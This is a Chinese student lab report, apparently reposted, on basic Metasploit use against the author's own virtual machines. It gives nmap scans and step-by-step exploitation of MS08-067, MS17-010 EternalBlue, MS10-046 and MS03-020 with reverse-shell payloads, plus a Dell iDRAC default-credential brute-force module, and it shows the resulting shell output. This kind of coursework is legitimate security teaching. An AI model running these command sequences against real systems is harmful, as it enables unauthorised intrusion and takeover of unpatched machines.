Exp6 MSF基礎應用


寫在前面

20200604:這個博客為啥有這么多的流量,我呆了,簡直引流之主……

原文:

上一次實驗,我遇到了一個問題,我的硬盤不夠用了。

我這主機小身板磁盤加一塊就256G,我的D盤還有8G,我還有一個matlab需要安裝。

所以

我去加了內存,嘿嘿

現在內存是夠用的,但是這次試驗以前我連着裝Linux、Windows2003、WindowsXP、Windows7也是挺快樂的,真的。

實驗總結

實驗完成情況

本次四個要求項都已完成,主動攻擊方面嘗試了MS08-067和MS17-010,瀏覽器方面嘗試了MS10-046,客戶端方面嘗試了針對IE瀏覽器的MS03-020,自我嘗試部分使用了針對dell的iDRAC的一個掃描器。

實驗的開始階段,由於我手上的Windows2003是中文版的,許多漏洞不支持,失敗了幾次,后來改用了英文版的XP和Win7就基本都能成功了。

MSF基礎應用的一般過程

這個實驗其實就是一個套路

首先想做什么就搜什么(search),選定一個就用(use),看一看大致什么情況(info),選一個payload(show payloads),選一個大寶貝(set payload []),看一下什么要求(show option),按照要求看看哪些必要(yes的項目),使用set設定(LPORT/LHOST etc.),運行(exploit)。

基礎問題問答

用自己的話解釋什么是exploit,payload,encode.

exploit:利用工具找到的漏洞,並對漏洞進行分析,從而攻擊。

payload:有效載荷,可以理解為搞破壞的關鍵代碼。電腦病毒中可以直接完成預定目標的代碼段便是其“有效載荷”。
encode:通過一些特殊手段的編碼,可以既保證有效載荷不被破壞,又使得漏洞攻擊程序不會被偵察到。

實驗體會

本次的實驗不難,是一個對exp4的繼承和發展,讓我對msf有了更深入的掌握,在嘗試上浪費了一些時間,但也學到了分析問題的能力。

距離實戰的技術或步驟

信息上,還需要掌握最新的漏洞信息

技術上,需要學會如何隱藏自己的攻擊

實驗過程

眾人的成功總是千篇一律,有趣的失敗萬里挑一。

失敗的嘗試

firefox_webidl_injection

在進行針對瀏覽器的攻擊方面,我還嘗試了一些其他的漏洞,比如針對火狐的firefox_webidl_injection,但是各個靶機都不符合要求。

MS06-071

還有是另一個針對XML的漏洞,編號MS06-071,這個漏洞被解決的時間比較早, 我手上的幾個版本都已經修復了,攻擊過程的截圖被我不小心丟了

CVE-2010-4452

還有一個Java的漏洞,編號CVE-2010-4452(https://www.cvedetails.com/cve/CVE-2010-4452/),但是嘗試之后只有顯示連接的消息,沒有提供命令行,可能是我的載荷選擇有問題。


這漏洞如果攻擊win10的話,可以看到聯網提示

MS05-054

這個漏洞是使用用戶點擊允許網頁彈出界面后進行注入的,我不太確定運行是否成功。

注入后會提醒安全提示

選擇同意

產生回連信息

針對Adobe的攻擊

這個部分我嘗試了好幾次,沒有成功。我認為可能是我的reader選擇的有問題

說到reader

抖音淡黃的長裙蓬松的頭發什么梗

我先是去adobe官網下載了各種遠古版本reader,但是都安裝失敗了,網絡上其他版本的reader可以安裝在XP上,但嘗試攻擊都不成功,我覺得是已經被修補了的版本,我尋思有找其他版本reader的時間,我還不如試試其他的,所以嘗試了IE瀏覽器的漏洞,但這樣又有一種還是針對瀏覽器的感覺,我也不知行不行。



對,我還試過excel的漏洞,但是遠古office比reader還難裝=。=

主動攻擊實踐

攻擊准備-掃描靶機系統

掃描WindowsXP

命令:

nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.124.126

結果:

[*] exec: nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.124.126

Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-02 17:15 CST
Nmap scan report for 192.168.124.126
Host is up (0.00095s latency).
All 1000 scanned ports on 192.168.124.126 are filtered
MAC Address: 00:0C:29:5F:53:72 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.95 ms 192.168.124.126

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.82 seconds

掃描Windows2003

命令:

nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.124.122

結果:

msf5 > nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.124.122
[*] exec: nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.124.122

Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-02 17:23 CST
Nmap scan report for 192.168.124.122
Host is up (0.0012s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
1025/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:0C:29:62:8C:54 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

TRACEROUTE
HOP RTT     ADDRESS
1   1.19 ms 192.168.124.122

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.21 seconds


MS08-067漏洞滲透攻擊實踐

什么是MS08-067?

Microsoft 安全公告 MS08-067 - 嚴重

  • 2017/10/11

服務器服務中的漏洞可能允許遠程執行代碼 (958644)

發布時間: 2008年10月23日

版本: 1.0

一般信息

摘要

此安全更新解決了服務器服務中一個秘密報告的漏洞。 如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼。 此漏洞可能用於進行蠕蟲攻擊。 防火牆最佳做法和標准的默認防火牆配置有助於保護網絡資源免受從企業外部發起的攻擊。

攻擊過程

msf5 exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description

----     ---------------  --------  -----------

   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description

----   ---------------  --------  -----------

   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name

--  ----

   0   Automatic Targeting

攻擊成功的命令行結果

msf5 exploit(windows/smb/ms08_067_netapi) > set set RHOSTS 192.168.124.126
set => RHOSTS 192.168.124.126
msf5 exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.124.124:4306 
[*] 192.168.124.126:445 - Automatically detecting the target...
[*] 192.168.124.126:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.124.126:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.124.126:445 - Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.124.124:4306 -> 192.168.124.126:1061) at 2020-05-02 17:46:22 +0800

systeminfo
systeminfo

Host Name:                 PETER-E04D978AD
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600

實驗結果分析

這里的結果非常的amazing啊

img

Host Name: PETER-E04D978AD(主機名稱)
OS Name: Microsoft Windows XP Professional(系統名稱、版本)
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Peter Don(注冊所有人)
Registered Organization:
Product ID: 76487-640-0059266-23187
Original Install Date: 5/1/2020, 11:12:58 PM(初始安裝時間,那個連裝四個操作系統的下午)
System Up Time: 0 Days, 0 Hours, 48 Minutes, 34 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform(系統模型)
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
01: x86 Family 6 Model 142 Stepping 9 GenuineIntel ~2903 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi(時區)
Total Physical Memory: 511 MB(內存情況)
Available Physical Memory: 333 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 2,004 MB
Virtual Memory: In Use: 44 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.(補丁情況)

NetWork Card(s): 2 NIC(s) Installed.(兩張網卡,一張是虛擬機提供的,另一個是藍牙)
01: VMware Accelerated AMD PCNet Adapter
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.124.1
IP address(es)

​ [02]: Bluetooth Device (Personal Area Network)
​ Connection Name: Bluetooth Network Connection
​ Status: Media disconnected

MS17_010漏洞滲透攻擊實踐

什么是MS17-010?

Microsoft 安全公告 MS17-010 - 嚴重

Microsoft Windows SMB 服務器安全更新 (4013389)

發布日期:2017 年 3 月 14 日

版本:1.0

執行摘要

此安全更新程序修復了 Microsoft Windows 中的多個漏洞。如果攻擊者向 Windows SMBv1 服務器發送特殊設計的消息,那么其中最嚴重的漏洞可能允許遠程執行代碼。

如果攻擊win10?當然不成功

攻擊過程

使用namp掃描漏洞
msf5 > nmap --script=vuln 192.168.124.126
[*] exec: nmap --script=vuln 192.168.124.126

Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-02 17:50 CST
Nmap scan report for 192.168.124.126
Host is up (0.0018s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2869/tcp open  icslap
MAC Address: 00:0C:29:5F:53:72 (VMware)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 17.01 seconds

經過查詢有三種:

exploit/windows/smb/ms17_010_eternalblue                        2017-03-14       average    No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8                   2017-03-14       average    No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec                             2017-03-14       normal     No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
命令
use exploit/windows/smb/ms17_010_eternalblue

show payloads

set payload generic/shell_reverse_tcp

show options

set RHOST [靶機IP]

set LHOST [本地IP]

exploit
攻擊成功報告:
[+] 192.168.124.125:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.124.125:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.124.125:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

systeminfo
systeminfo

������:           WIN-O4TRDF665LL
OS ����:          Microsoft Windows 7 רҵ�� 
OS �汾:          6.1.7601 Service Pack 1 Build 7601
OS ������:        Microsoft Corporation
OS ����:          ��������վ
OS ��������:      Multiprocessor Free
ע���������:     Windows �û�
ע�����֯:       
��Ʒ ID:          00371-OEM-8992671-00524
��ʼ��װ����:     2020/5/1, 19:58:52
ϵͳ����ʱ��:     2020/5/2, 18:46:34
ϵͳ������:       VMware, Inc.
ϵͳ�ͺ�:         VMware Virtual Platform
ϵͳ����:         x64-based PC
������:           ��װ�� 1 ����������
                  [01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~2904 Mhz
BIOS �汾:        Phoenix Technologies LTD 6.00, 2018/4/13
Windows Ŀ¼:     C:\Windows
ϵͳĿ¼:         C:\Windows\system32
�����豸:         \Device\HarddiskVolume1
ϵͳ��������:     zh-cn;����(�й�)
���뷨��������:   zh-cn;����(�й�)
ʱ��:             (UTC+08:00)���������죬����ر�����������³ľ��
�����ڴ�����:     2,047 MB
���õ������ڴ�:   1,399 MB
�����ڴ�: ���ֵ: 4,095 MB
�����ڴ�: ����:   3,385 MB
�����ڴ�: ʹ����: 710 MB
ҳ���ļ�λ��:     C:\pagefile.sys
��:               WORKGROUP
��¼������:       ��ȱ
�޲�����:         ��װ�� 3 ���޲�����

[01]: KB2534111
[02]: KB2999226
[03]: KB976902

����:             ��װ�� 2 �� NIC��
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      ������:      ��������
                      ���� DHCP:   ��
                      DHCP ������: 192.168.124.1
                      IP ��ַ

[01]: 192.168.124.125
[02]: fe80::c813:fa10:7b76:6c0c

​                  [02]: Bluetooth �豸(����������)
​                      ������:      Bluetooth ��������
​                      ״̬:        ý���������ж�

針對瀏覽器的攻擊

ms10_046漏洞攻擊

什么是ms10-046?

Microsoft 安全公告 MS10-046 - 嚴重

  • 2017/10/11

Windows Shell 中的漏洞可能允許遠程執行代碼 (2286198)

發布時間: 2010年8月2日 | 更新時間: 2010年8月24日

版本: 1.2

一般信息

摘要

此安全更新解決了 Windows Shell 中一個公開披露的漏洞。 如果顯示特制的快捷方式圖標,則該漏洞可能允許遠程執行代碼。 成功利用此漏洞的攻擊者可以獲得與本地用戶相同的用戶權限。 那些帳戶被配置為擁有較少系統用戶權限的用戶比具有管理用戶權限的用戶受到的影響要小。

攻擊過程:

cd /usr/share/metasploit-framework/modules/exploits/windows/browser

ms10_046_shortcut_icon_dllloader.rb

search ms10_046

use windows/browser/ms10_046_shortcut_icon_dllloader

show payloads

set payload windows/meterpreter/reverse_tcp

set LHOST [本地IP]

set SRVHOS [本地IP]

exploit

攻擊結果

針對客戶端的攻擊

針對IE瀏覽器的MS03-020漏洞攻擊(唯一)

什么是MS03-020?

(以下省略無關部分)

Microsoft安全公告MS03-020-嚴重

Internet Explorer的累積修補程序(818529)

發布時間:2003年6月4日| 更新日期:2003年6月4日

版本: 1.1

最初發布: 2003年6月4日

摘要

漏洞的影響: 允許攻擊者在用戶的系統上執行代碼

最高嚴重等級: 嚴重

建議: 系統管理員應立即安裝補丁

最終用戶公告: 可從以下位置獲得此公告的最終用戶版本:

http://www.microsoft.com/athome/security/update/bulletins/default.mspx。

受影響的軟件:

  • Microsoft Internet Explorer 5.01
  • Microsoft Internet瀏覽器5.5
  • Microsoft Internet Explorer 6.0
  • Windows Server 2003的Microsoft Internet Explorer 6.0

一般信息

技術細節

技術說明:

這是一個累積性補丁,其中包括Internet Explorer 5.01、5.5和6.0以前所有已發布補丁的功能。此外,它消除了兩個新發現的漏洞:

  • 由於Internet Explorer無法正確確定從Web服務器返回的對象類型而發生的緩沖區溢出漏洞。利用此漏洞的攻擊者有可能在用戶的系統上運行任意代碼。如果用戶訪問了攻擊者的網站,則攻擊者可能無需任何其他用戶操作即可利用此漏洞。攻擊者還可能制作試圖利用此漏洞的HTML電子郵件。
  • 由於Internet Explorer在文件下載對話框上未實現適當的阻止而導致的缺陷。攻擊者可能利用此漏洞在用戶系統上運行任意代碼。如果用戶只是訪問了攻擊者的網站,則攻擊者可能無需任何其他用戶操作即可利用此漏洞。攻擊者還可能制作試圖利用此漏洞的HTML電子郵件。

為了利用這些缺陷,攻擊者必須創建一種特殊格式的HTML電子郵件並將其發送給用戶。或者,攻擊者必須擁有一個惡意網站,該網站包含旨在利用這些漏洞的網頁。然后,攻擊者必須說服用戶訪問該站點。

與公告MS03-004MS03-015一起發布的以前的Internet Explorer累積修補程序一樣,如果您尚未應用HTML幫助更新,則此累積修補程序將導致window.showHelp()停止運行。如果您已經安裝了知識庫文章811630中更新的HTML幫助控件,則在應用此修補程序之后,仍然可以使用HTML幫助功能。

過程

搜索explorer

使用info查看漏洞,確認可以攻擊

Basic options:
  Name     Current Setting  Required  Description

----     ---------------  --------  -----------

  SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)

需要輸入本地的IP或者廣播地址,默認8080端口,都可以不改

查看載荷show payload

使用祖傳載荷

show option

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description

----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

還需要輸入LHOST和LPORT,而后即可攻擊,圖為本地主機的反彈鏈接

成功應用任何一個輔助模塊

掃描工具Dell iDRAC Default Login(唯一)

首先查找有興趣的漏洞,因為我的主機是dell的,我找了一個dell的掃描器。

iDRAC 是什么?

帶 Lifecycle Controller 的集成戴爾遠程訪問控制器 (iDRAC) 嵌入在每個 Dell EMC PowerEdge™ 服務器中,其功能可幫助 IT 管理員部署、更新、監控和維護服務器,而無需安裝任何額外軟件。Dell iDRAC 的工作不受操作系統或虛擬機管理程序存在的影響,因為 iDRAC 在出廠時就已嵌入每個服務器中,其已准備好從預操作系統或裸機狀態工作。

使用info進行查看
msf5 auxiliary(scanner/http/dell_idrac) > info

       Name: Dell iDRAC Default Login
     Module: auxiliary/scanner/http/dell_idrac
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Cristiano Maruti <cmaruti@gmail.com>

Check supported:
  Yes

Basic options:
  Name              Current Setting                                                        Required  Description

----              ---------------                                                        --------  -----------

  BLANK_PASSWORDS   false                                                                  no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                      yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                                  no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                                                                  no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                                                                  no        Add all users in the current database to the list
  PASSWORD                                                                                 no        A specific password to authenticate with
  PASS_FILE         /usr/share/metasploit-framework/data/wordlists/idrac_default_pass.txt  no        File containing passwords, one per line
  Proxies                                                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS            192.168.124.118                                                        yes       The target address range or CIDR identifier
  RPORT             443                                                                    yes       Default remote port
  STOP_ON_SUCCESS   false                                                                  yes       Stop guessing when a credential works for a host
  TARGETURI         /data/login                                                            yes       Path to the iDRAC Administration page
  THREADS           1                                                                      yes       The number of concurrent threads
  USERNAME                                                                                 no        A specific username to authenticate as
  USERPASS_FILE                                                                            no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                                  no        Try the username as the password for all users
  USER_FILE         /usr/share/metasploit-framework/data/wordlists/idrac_default_user.txt  no        File containing users, one per line
  VERBOSE           true                                                                   yes       Whether to print output for all attempts
  VHOST                                                                                    no        HTTP server virtual host

Description:
  This module attempts to login to a iDRAC webserver instance using 
  default username and password. Tested against Dell Remote Access 
  Controller 6 - Express version 1.50 and 1.85

可以看到要求的配置項不多,它大概就是嘗試使用默認的用戶名和密碼對Dell的這個遠程控制軟件進行登錄。

選擇載荷-配置-探查
探查結果-no exit


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM